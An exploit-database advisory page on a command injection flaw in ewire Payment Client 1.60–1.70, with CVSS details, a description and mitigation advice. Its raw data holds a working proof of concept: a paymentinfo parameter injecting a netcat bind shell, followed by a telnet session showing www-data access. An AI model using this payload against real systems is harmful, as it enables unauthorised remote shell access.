header-logo
Suggest Exploit
vendor:
Payment Client
by:
Unknown
7.5
CVSS
HIGH
Arbitrary Command Execution
78
CWE
Product Name: Payment Client
Affected Version From: 1.6
Affected Version To: 1.7
Patch Exists: NO
Related CWE: None mentioned
CPE: a:ewire:payment_client:1.60 cpe:/a:ewire:payment_client:1.70
Metasploit:
Other Scripts:
Platforms Tested: None mentioned
Unknown

Arbitrary Command Execution in ewire Payment Client

The ewire Payment Client is vulnerable to an arbitrary command execution vulnerability. Attackers can exploit this vulnerability by injecting malicious input, which is not properly sanitized by the software. This allows the attacker to execute arbitrary shell commands on the affected computer, with the privileges of the application using the affected class utility.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user-supplied input properly before using it in commands. Additionally, regular software updates and patches should be applied to ensure the latest security fixes are in place.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25683/info

ewire Payment Client is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary shell commands on an affected computer with the privileges of the application using the affected class utility.

ewire Payment Client 1.60 and 1.70 are vulnerable to this issue. 

GET
http://www.example.com/simplePHPLinux/3payment_receive.php?paymentin
fo=`/bin/nc -l -p6666 -e /bin/bash`
$ telnet www.example.com 6666
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Navigation

Suggest Exploit

Services By CQR